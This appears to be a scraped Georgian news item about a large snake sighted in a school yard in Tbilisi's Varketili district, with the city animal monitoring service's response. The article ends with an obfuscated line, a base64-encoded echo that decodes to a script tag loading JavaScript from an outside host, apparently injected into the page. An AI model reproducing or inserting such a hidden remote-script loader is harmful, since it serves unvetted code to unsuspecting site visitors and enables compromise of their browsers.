celsiusi
ავერსი საქკაბელი
ვარკეთილში, 180-ე საჯარო სკოლის ეზოში, შენობის წინ მოზრდილი გველი ნახეს. ამის შესახებ ფოტო და ვიდეო მასალა სოციალურ ქსელში, ჯგუფში “ვარკეთილი- varketili” თვითმხილველმა ატვირთა. 
 
როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს თბილისის მერიის ცხოველთა მონიტორინგის სამსახურში განუცხადეს, იყო შეტყობინება აღნიშნულ ფაქტზე და ადგილზე  მივიდა ეკიპაჟი.
 
 
“ქვეწარმავლის მოძიება ვერ მოხერხდა, ალბათ უკვე მიიმალა. დღესვე უნდა შეეწამლათ, თუმცა დირექტორი არ იყო და ხვალ აუცილებლად მოხდება შეწამვლა.”- განაცხადეს მერიის ცხოველთა მონიტორინგის სააგენტოში. 
 
მათივე ცნობით, დათბობასთან ერთად გამოზახება გველებთან დაკავშირებით ჩვეულებისამებრ მომატებულია.
 
1506
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");